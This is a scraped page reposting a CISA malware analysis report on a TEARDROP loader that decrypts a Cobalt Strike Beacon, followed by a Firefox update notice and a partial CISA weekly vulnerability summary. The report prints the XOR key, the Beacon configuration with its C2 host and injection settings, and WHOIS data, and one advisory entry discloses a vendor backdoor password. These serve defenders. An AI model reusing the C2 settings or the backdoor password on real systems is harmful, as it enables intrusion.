fdbd0954169972c21876938dbd536da3 .rdata 1536 3.636101
7eddb104f4aad897faffc33762e896cf .pdata 7680 5.364572
8232395ce211b61e4df169c38afdb7f6 .xdata 3072 1.658757
d41d8cd98f00b204e9800998ecf8427e .bss 0 0.000000
add3d2ca7de32da5c3a5d2718129d600 .edata 15872 5.809199
8e6af2ae43eb16502507eeb8c7c03aa5 .idata 2560 3.983544
768bf26d947f32101953daeeea4a19b1 .CRT 512 0.238291
60227c557d35a7f2cf79a13c284b1dab .tls 512 0.335735
2d007e3e5c7f7423ed5c43b129f03f34 .rsrc 1024 2.956911
ddbe94bbe8aeacf9cb120fe816659354 .reloc 512 1.215071
Relationships
b820e8a205… Connected_To infinitysoftwares.com
Description

This file is a malicious 64-bit DLL, identified as a variant of the TEARDROP loader. During runtime, the malicious application decodes and executes an embedded code buffer using an XOR based stream cipher. Displayed below is the key utilized by the cipher algorithm to decrypt the embedded code buffer:

—Begin XOR Cipher Key—
AFAFD51031EE936AFC50B611CDC70E7E62A7BAFCA72B43DB0023915BBBBAC016A5331CB28EE6E3DF0804B24004D219EE7ED24C7B41D9669C21A7AECB1B87927C4ED5A25949404DD2218091F00DD9F874B955D1615534FEF8C5200DFDA816FF4A023CF1D2E679AFCA79A5C5BB4C871ABF34CA641E5F1ACC42864CEE8BF5921A4E0DAC1D18C090D15D0CC79A843D9F763B4D323A34B26216F065705A62B47000BED185E7E2A7DE306DB6C94B5D3C2DA5FF8149AB8A7D13C3E0A3DAC5BEC46A9BD0D9
—End XOR Cipher Key—

The embedded code buffer contains the malicious identified as Cobalt Strike Beacon (version 4) RAT. Displayed below is the embedded Beacon configuration data:

—Begin Cobalt Beacon Configuration Data—
BeaconType                     – HTTPS
Port                             – 443
SleepTime                        – 14400000
MaxGetSize                     – 1049217
Jitter                         – 23
MaxDNS                         – 255
C2Server                         – infinitysoftwares.com,/files/information_055.pdf
UserAgent                        – Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36
HttpPostUri                     – /wp-admin/new_file.php
Malleable_C2_Instructions        – Remove 313 bytes from the end
                                Remove 324 bytes from the beginning
                                XOR mask w/ random key
HttpGet_Metadata                 – Referer: https://twitter.com/
                                Host: infinitysoftwares.com
                                Accept: */*
                                Accept-Language: en-US
                                Accept-Encoding: gzip, deflate
                                Connection: close
                                PHPSESSID=
                                Cookie
HttpPost_Metadata                – Host: infinitysoftwares.com
                                Accept: */*
                                Accept-Language: en-US
                                Connection: close
                                name=”uploaded_1″;filename=”33139.pdf”
Content-Type: text/plain

                                r
SpawnTo                         – b’x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00′
PipeName                         –
DNS_Idle                         – 208.67.220.220
DNS_Sleep                        – 0
SSH_Host                         – Not Found
SSH_Port                         – Not Found
SSH_Username                     – Not Found
SSH_Password_Plaintext         – Not Found
SSH_Password_Pubkey             – Not Found
HttpGet_Verb                     – GET
HttpPost_Verb                    – POST
HttpPostChunk                    – 0
Spawnto_x86                     – %windir%syswow64print.exe
Spawnto_x64                     – %windir%sysnativemsiexec.exe
CryptoScheme                     – 0
Proxy_Config                     – Not Found
Proxy_User                     – Not Found
Proxy_Password                 – Not Found
Proxy_Behavior                 – Use IE settings
Watermark                        – 943010104
bStageCleanup                    – True
bCFGCaution                     – False
KillDate                         – 0
bProcInject_StartRWX             – False
bProcInject_UseRWX             – False
bProcInject_MinAllocSize         – 8493
ProcInject_PrependAppend_x86     – b’x90x90′
                                Empty
ProcInject_PrependAppend_x64     – b’x0fx1fx00′
                                Empty
ProcInject_Execute             – ntdll:RtlUserThreadStart
                                CreateThread
                                NtQueueApcThread
                                SetThreadContext
ProcInject_AllocationMethod     – NtMapViewOfSection
bUsesCookies                     – True
HostHeader                     –
—End Cobalt Beacon Configuration Data—

Screenshots

Figure 3 - Screenshot of the XOR based cipher utilized by this TEARDROP variant to decode an embedded Cobalt Strike Beacon payload.

Figure 3 – Screenshot of the XOR based cipher utilized by this TEARDROP variant to decode an embedded Cobalt Strike Beacon payload.

infinitysoftwares.com

Tags

command-and-control

URLs
  • infinitysoftwares.com/files/information_055.pdf
Ports
Whois

Domain Name: infinitysoftwares.com
Registry Domain ID: 2356151174_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com/
Updated Date: 2021-01-01T07:00:00Z
Creation Date: 2019-01-28T07:00:00Z
Registrar Registration Expiration Date: 2021-01-28T07:00:00Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Domain Administrator
Registrant Organization: See PrivacyGuardian.org
Registrant Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Registrant City: Phoenix
Registrant State/Province: AZ
Registrant Postal Code: 85016
Registrant Country: US
Registrant Phone: +1.3478717726
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: pw-531dcecd9bbebe6f78f00ff61cc84da6@privacyguardian.org
Registry Admin ID:
Admin Name: Domain Administrator
Admin Organization: See PrivacyGuardian.org
Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Admin City: Phoenix
Admin State/Province: AZ
Admin Postal Code: 85016
Admin Country: US
Admin Phone: +1.3478717726
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: pw-531dcecd9bbebe6f78f00ff61cc84da6@privacyguardian.org
Registry Tech ID:
Tech Name: Domain Administrator
Tech Organization: See PrivacyGuardian.org
Tech Street: 1928 E. Highland Ave. Ste F104 PMB# 255
Tech City: Phoenix
Tech State/Province: AZ
Tech Postal Code: 85016
Tech Country: US
Tech Phone: +1.3478717726
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: pw-531dcecd9bbebe6f78f00ff61cc84da6@privacyguardian.org
Name Server: NS1.DNSOWL.COM
Name Server: NS2.DNSOWL.COM
Name Server: NS3.DNSOWL.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

Relationships
infinitysoftwares.com Connected_From b820e8a2057112d0ed73bd7995201dbed79a79e13c79d4bdad81a22f12387e07
Description

This domain is the C2 for the sample “b820e8a2057112d0ed73bd7995201dbed79a79e13c79d4bdad81a22f12387e07.”

Relationship Summary

1817a5bf9c… Connected_To ervsystem.com
ervsystem.com Connected_From 1817a5bf9c01035bcf8a975c9f1d94b0ce7f6a200339485d8f93859f8f6d730c
b820e8a205… Connected_To infinitysoftwares.com
infinitysoftwares.com Connected_From b820e8a2057112d0ed73bd7995201dbed79a79e13c79d4bdad81a22f12387e07

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.surveymonkey.com/r/G8STDRY

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

Mozilla Releases Security Updates for Firefox and Firefox ESR

This article is contributed. See the original author and article here.

Mozilla has released security updates addressing a vulnerability affecting Firefox and Firefox ESR. An attacker can take advantage of this vulnerability to take control of an affected system.  

CISA encourages users and administrators to review the Mozilla security advisory for Firefox 85.0.1 and Firefox ESR 78.7.1 and apply the necessary updates.  

Vulnerability Summary for the Week of February 1, 2021

This article is contributed. See the original author and article here.

huawei — multiple_products There is an information leak vulnerability in eCNS280_TD versions V100R005C00 and V100R005C10. A command does not have timeout exit mechanism. Temporary file contains sensitive information. This allows attackers to obtain information by inter-process access that requires other methods. 2021-02-06 not yet calculated CVE-2021-22300
CONFIRM allen-bradley — flex_io_1794-aent/b
  An exploitable denial of service vulnerability exists in the ENIP Request Path Network Segment functionality of Allen-Bradley Flex IO 1794-AENT/B 4.003. A specially crafted network request can cause a loss of communications with the device resulting in denial-of-service. An attacker can send a malicious packet to trigger this vulnerability. 2021-02-04 not yet calculated CVE-2020-6088
MISC angular — angular
  angular-expressions is “angular’s nicest part extracted as a standalone module for the browser and node”. In angular-expressions before version 1.1.2 there is a vulnerability which allows Remote Code Execution if you call “expressions.compile(userControlledInput)” where “userControlledInput” is text that comes from user input. The security of the package could be bypassed by using a more complex payload, using a “.constructor.constructor” technique. In terms of impact: If running angular-expressions in the browser, an attacker could run any browser script when the application code calls expressions.compile(userControlledInput). If running angular-expressions on the server, an attacker could run any Javascript expression, thus gaining Remote Code Execution. This is fixed in version 1.1.2 of angular-expressions A temporary workaround might be either to disable user-controlled input that will be fed into angular-expressions in your application or allow only following characters in the userControlledInput. 2021-02-01 not yet calculated CVE-2021-21277
MISC
MISC
CONFIRM
MISC asuswrt — asus_rt-ax3000_firmware
  Denial of service in ASUSWRT ASUS RT-AX3000 firmware versions 3.0.0.4.384_10177 and earlier versions allows an attacker to disrupt the use of device setup services via continuous login error. 2021-02-05 not yet calculated CVE-2021-3229
MISC
MISC
MISC bitcoin — core
  Bitcoin Core before 0.19.0 might allow remote attackers to execute arbitrary code when another application unsafely passes the -platformpluginpath argument to the bitcoin-qt program, as demonstrated by an x-scheme-handler/bitcoin handler for a .desktop file or a web browser. NOTE: the discoverer states “I believe that this vulnerability cannot actually be exploited.” 2021-02-04 not yet calculated CVE-2021-3401
MISC
MISC blaze — blaze
  Http4s (http4s-blaze-server) is a minimal, idiomatic Scala interface for HTTP services. Http4s before versions 0.21.17, 0.22.0-M2, and 1.0.0-M14 have a vulnerability which can lead to a denial-of-service. Blaze-core, a library underlying http4s-blaze-server, accepts connections unboundedly on its selector pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections. http4s provides a general “MaxActiveRequests” middleware mechanism for limiting open connections, but it is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open. In 0.21.17, 0.22.0-M2, and 1.0.0-M14, a new “maxConnections” property, with a default value of 1024, has been added to the `BlazeServerBuilder`. Setting the value to a negative number restores unbounded behavior, but is strongly disrecommended. The NIO2 backend does not respect `maxConnections`. Its use is now deprecated in http4s-0.21, and the option is removed altogether starting in http4s-0.22. There are several possible workarounds described in the refrenced GitHub Advisory GHSA-xhv5-w9c5-2r2w. 2021-02-02 not yet calculated CVE-2021-21294
MISC
MISC
CONFIRM blaze — blaze
  blaze is a Scala library for building asynchronous pipelines, with a focus on network IO. All servers running blaze-core before version 0.14.15 are affected by a vulnerability in which unbounded connection acceptance leads to file handle exhaustion. Blaze, accepts connections unconditionally on a dedicated thread pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections. The vast majority of affected users are using it as part of http4s-blaze-server <= 0.21.16. http4s provides a mechanism for limiting open connections, but is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open. The issue is fixed in version 0.14.15 for “NIO1SocketServerGroup”. A “maxConnections” parameter is added, with a default value of 512. Concurrent connections beyond this limit are rejected. To run unbounded, which is not recommended, set a negative number. The “NIO2SocketServerGroup” has no such setting and is now deprecated. There are several possible workarounds described in the refrenced GitHub Advisory GHSA-xmw9-q7x9-j5qc. 2021-02-02 not yet calculated CVE-2021-21293
MISC
CONFIRM
MISC cisco — 8000_series_routers
  A vulnerability in a CLI command of Cisco IOS XR Software for the Cisco 8000 Series Routers and Network Convergence System 540 Series Routers running NCS540L software images could allow an authenticated, local attacker to elevate their privilege to root. To exploit this vulnerability, an attacker would need to have a valid account on an affected device. The vulnerability is due to insufficient validation of command line arguments. An attacker could exploit this vulnerability by authenticating to the device and entering a crafted command at the prompt. A successful exploit could allow an attacker with low-level privileges to escalate their privilege level to root. 2021-02-04 not yet calculated CVE-2021-1370
CISCO cisco — ios_xr_software
  A vulnerability in the Local Packet Transport Services (LPTS) programming of the SNMP with the management plane protection feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to allow connections despite the management plane protection that is configured to deny access to the SNMP server of an affected device. This vulnerability is due to incorrect LPTS programming when using SNMP with management plane protection. An attacker could exploit this vulnerability by connecting to an affected device using SNMP. A successful exploit could allow the attacker to connect to the device on the configured SNMP ports. Valid credentials are required to execute any of the SNMP requests. 2021-02-04 not yet calculated CVE-2021-1243
CISCO cisco — ios_xr_software
  A vulnerability in the IPv6 protocol handling of the management interfaces of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to cause an IPv6 flood on the management interface network of an affected device. The vulnerability exists because the software incorrectly forwards IPv6 packets that have an IPv6 node-local multicast group address destination and are received on the management interfaces. An attacker could exploit this vulnerability by connecting to the same network as the management interfaces and injecting IPv6 packets that have an IPv6 node-local multicast group address destination. A successful exploit could allow the attacker to cause an IPv6 flood on the corresponding network. Depending on the number of Cisco IOS XR Software nodes on that network segment, exploitation could cause excessive network traffic, resulting in network degradation or a denial of service (DoS) condition. 2021-02-04 not yet calculated CVE-2021-1268
CISCO cisco — ios_xr_software
  Multiple vulnerabilities in the ingress packet processing function of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. 2021-02-04 not yet calculated CVE-2021-1288
CISCO cisco — ios_xr_software
  Multiple vulnerabilities in the ingress packet processing function of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. 2021-02-04 not yet calculated CVE-2021-1313
CISCO cisco — ios_xr_software
  A vulnerability in the IPv6 traffic processing of Cisco IOS XR Software and Cisco NX-OS Software for certain Cisco devices could allow an unauthenticated, remote attacker to bypass an IPv6 access control list (ACL) that is configured for an interface of an affected device. The vulnerability is due to improper processing of IPv6 traffic that is sent through an affected device. An attacker could exploit this vulnerability by sending crafted IPv6 packets that traverse the affected device. A successful exploit could allow the attacker to access resources that would typically be protected by the interface ACL. 2021-02-04 not yet calculated CVE-2021-1389
CISCO cisco — ios_xr_software
  A vulnerability in the CLI parser of Cisco IOS XR Software could allow an authenticated, local attacker to view more information than their privileges allow. The vulnerability is due to insufficient application of restrictions during the execution of a specific command. An attacker could exploit this vulnerability by using a specific command at the command line. A successful exploit could allow the attacker to obtain sensitive information within the configuration that otherwise might not have been accessible beyond the privileges of the invoking user. 2021-02-04 not yet calculated CVE-2021-1128
CISCO cisco — managed_services_accelerator
  A vulnerability in the REST API of Cisco Managed Services Accelerator (MSX) could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to the way that the affected software logs certain API requests. An attacker could exploit this vulnerability by sending a flood of crafted API requests to an affected device. A successful exploit could allow the attacker to cause a DoS condition on the affected device. 2021-02-04 not yet calculated CVE-2021-1266
CISCO cisco — multiple_small_business_routers Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to conduct directory traversal attacks and overwrite certain files that should be restricted on an affected system. These vulnerabilities are due to insufficient input validation. An attacker could exploit these vulnerabilities by using the web-based management interface to upload a file to location on an affected device that they should not have access to. A successful exploit could allow the attacker to overwrite files on the file system of the affected device. 2021-02-04 not yet calculated CVE-2021-1297
CISCO cisco — multiple_small_business_routers Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. 2021-02-04 not yet calculated CVE-2021-1295
CISCO cisco — multiple_small_business_routers Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. 2021-02-04 not yet calculated CVE-2021-1291
CISCO cisco — multiple_small_business_routers Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. 2021-02-04 not yet calculated CVE-2021-1290
CISCO cisco — multiple_small_business_routers
  Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. 2021-02-04 not yet calculated CVE-2021-1315
CISCO cisco — multiple_small_business_routers
  Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. 2021-02-04 not yet calculated CVE-2021-1314
CISCO cisco — multiple_small_business_routers
  Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. 2021-02-04 not yet calculated CVE-2021-1316
CISCO cisco — multiple_small_business_routers
  Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to conduct directory traversal attacks and overwrite certain files that should be restricted on an affected system. These vulnerabilities are due to insufficient input validation. An attacker could exploit these vulnerabilities by using the web-based management interface to upload a file to location on an affected device that they should not have access to. A successful exploit could allow the attacker to overwrite files on the file system of the affected device. 2021-02-04 not yet calculated CVE-2021-1296
CISCO cisco — multiple_small_business_routers
  Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. 2021-02-04 not yet calculated CVE-2021-1294
CISCO cisco — multiple_small_business_routers
  Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. 2021-02-04 not yet calculated CVE-2021-1292
CISCO cisco — multiple_small_business_routers
  Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. 2021-02-04 not yet calculated CVE-2021-1289
CISCO cisco — multiple_small_business_routers
  Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. 2021-02-04 not yet calculated CVE-2021-1317
CISCO cisco — multiple_small_business_routers
  Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers could allow an authenticated, remote attacker to inject arbitrary commands that are executed with root privileges. These vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on an affected device. 2021-02-04 not yet calculated CVE-2021-1318
CISCO cisco — multiple_small_business_routers
  Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV160, RV160W, RV260, RV260P, and RV260W VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code as the root user on an affected device. These vulnerabilities exist because HTTP requests are not properly validated. An attacker could exploit these vulnerabilities by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to remotely execute arbitrary code on the device. 2021-02-04 not yet calculated CVE-2021-1293
CISCO cisco — network_convergence_system_540_series_routers
  Multiple vulnerabilities in Cisco Network Convergence System (NCS) 540 Series Routers, only when running Cisco IOS XR NCS540L software images, and Cisco IOS XR Software for the Cisco 8000 Series Routers could allow an authenticated, local attacker to execute unsigned code during the boot process on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. 2021-02-04 not yet calculated CVE-2021-1244
CISCO cisco — network_convergence_system_540_series_routers
  Multiple vulnerabilities in Cisco Network Convergence System (NCS) 540 Series Routers, only when running Cisco IOS XR NCS540L software images, and Cisco IOS XR Software for the Cisco 8000 Series Routers could allow an authenticated, local attacker to execute unsigned code during the boot process on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. 2021-02-04 not yet calculated CVE-2021-1136
CISCO cisco — unified_computing_system
  A vulnerability in the certificate registration process of Cisco Unified Computing System (UCS) Central Software could allow an authenticated, adjacent attacker to register a rogue Cisco Unified Computing System Manager (UCSM). This vulnerability is due to improper certificate validation. An attacker could exploit this vulnerability by sending a crafted HTTP request to the registration API. A successful exploit could allow the attacker to register a rogue Cisco UCSM and gain access to Cisco UCS Central Software data and Cisco UCSM inventory data. 2021-02-04 not yet calculated CVE-2021-1354
CISCO cisco — webex_meetings_and_webex_meetings_server_software
  A vulnerability in the user interface of Cisco Webex Meetings and Cisco Webex Meetings Server Software could allow an authenticated, remote attacker to inject a hyperlink into a meeting invitation email. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by entering a URL into a field in the user interface. A successful exploit could allow the attacker to generate a Webex Meetings invitation email that contains a link to a destination of their choosing. Because this email is sent from a trusted source, the recipient may be more likely to click the link. 2021-02-04 not yet calculated CVE-2021-1221
CISCO clustered_data — ontap Clustered Data ONTAP versions prior to 9.3P20 and 9.5P15 are susceptible to a vulnerability which could allow unauthorized tenant users to discover the existence of data on other Storage Virtual Machines (SVMs). 2021-02-03 not yet calculated CVE-2020-8588
CONFIRM clustered_data — ontap
  Clustered Data ONTAP versions prior to 9.3P20 and 9.5P15 are susceptible to a vulnerability which could allow unauthorized tenant users to discover the names of other Storage Virtual Machines (SVMs) and filenames on those SVMs. 2021-02-03 not yet calculated CVE-2020-8589
CONFIRM com.squareup:connet — com.squareup:connet
  This affects all versions of package com.squareup:connect. The method prepareDownloadFilecreates creates a temporary file with the permissions bits of -rw-r–r– on unix-like systems. On unix-like systems, the system temporary directory is shared between users. As such, the contents of the file downloaded by downloadFileFromResponse will be visible to all other users on the local system. A workaround fix for this issue is to set the system property java.io.tmpdir to a safe directory as remediation. Note: This version of the SDK is end of life and no longer maintained, please upgrade to the latest version. 2021-02-03 not yet calculated CVE-2021-23331
CONFIRM
CONFIRM docker — docker In Docker before versions 9.03.15, 20.10.3 there is a vulnerability involving the –userns-remap option in which access to remapped root allows privilege escalation to real root. When using “–userns-remap”, if the root user in the remapped namespace has access to the host filesystem they can modify files under “/var/lib/docker/<remapping>” that cause writing files with extended privileges. Versions 20.10.3 and 19.03.15 contain patches that prevent privilege escalation from remapped user. 2021-02-02 not yet calculated CVE-2021-21284
MISC
MISC
MISC
MISC
CONFIRM docker — docker In Docker before versions 9.03.15, 20.10.3 there is a vulnerability in which pulling an intentionally malformed Docker image manifest crashes the dockerd daemon. Versions 20.10.3 and 19.03.15 contain patches that prevent the daemon from crashing. 2021-02-02 not yet calculated CVE-2021-21285
MISC
MISC
MISC
MISC
CONFIRM eclipse — californium
  In Eclipse Californium version 2.3.0 to 2.6.0, the certificate based (x509 and RPK) DTLS handshakes accidentally fails, because the DTLS server side sticks to a wrong internal state. That wrong internal state is set by a previous certificate based DTLS handshake failure with TLS parameter mismatch. The DTLS server side must be restarted to recover this. This allow clients to force a DoS. 2021-02-03 not yet calculated CVE-2020-27222
CONFIRM electric_coin_company — zcashd
  Electric Coin Company Zcashd before 2.1.1-1 allows attackers to trigger consensus failure and double spending. A valid chain could be incorrectly rejected because timestamp requirements on block headers were not properly enforced. 2021-02-05 not yet calculated CVE-2020-8806
MISC electric_coin_company — zcashd
  In Electric Coin Company Zcashd before 2.1.1-1, the time offset between messages could be leveraged to obtain sensitive information about the relationship between a suspected victim’s address and an IP address, aka a timing side channel. 2021-02-05 not yet calculated CVE-2020-8807
MISC elliptic — elliptic
  The package elliptic before 6.5.4 are vulnerable to Cryptographic Issues via the secp256k1 implementation in elliptic/ec/key.js. There is no check to confirm that the public key point passed into the derive function actually exists on the secp256k1 curve. This results in the potential for the private key used in this implementation to be revealed after a number of ECDH operations are performed. 2021-02-02 not yet calculated CVE-2020-28498
MISC
CONFIRM
CONFIRM
MISC epikur — epikur
  An issue was discovered in Epikur before 20.1.1. The Epikur server contains the checkPasswort() function that, upon user login, checks the submitted password against the user password’s MD5 hash stored in the database. It is also compared to a second MD5 hash, which is the same for every user (aka a “Backdoor Password” of 3p1kursupport). If the submitted password matches either one, access is granted. 2021-02-05 not yet calculated CVE-2020-10539
MISC epikur — epikur
  An issue was discovered in Epikur before 20.1.1. A Glassfish 4.1 server with a default configuration is running on TCP port 4848. No password is required to access it with the administrator account. 2021-02-05 not yet calculated CVE-2020-10537
MISC epikur — epikur
  An issue was discovered in Epikur before 20.1.1. It stores the secret passwords of the users as MD5 hashes in the database. MD5 can be brute-forced efficiently and should not be used for such purposes. Additionally, since no salt is used, rainbow tables can speed up the attack. 2021-02-05 not yet calculated CVE-2020-10538
MISC epson — iprojection
  In Epson iProjection v2.30, the driver file (EMP_NSAU.sys) allows local users to cause a denial of service (BSOD) via crafted input to the virtual audio device driver with IOCTL 0x9C402402, 0x9C402406, or 0x9C40240A. DeviceEMPNSAUIO and DosDevicesEMPNSAU are similarly affected. 2021-02-05 not yet calculated CVE-2020-9014
MISC
MISC
MISC epson — iprojection
  In Epson iProjection v2.30, the driver file EMP_MPAU.sys allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x9C402406 and IOCtl 0x9C40240A. (0x9C402402 has only a NULL pointer dereference.) This affects DeviceEMPMPAUIO and DosDevicesEMPMPAU. 2021-02-05 not yet calculated CVE-2020-9453
MISC
MISC
MISC freediskspace — freediskspace
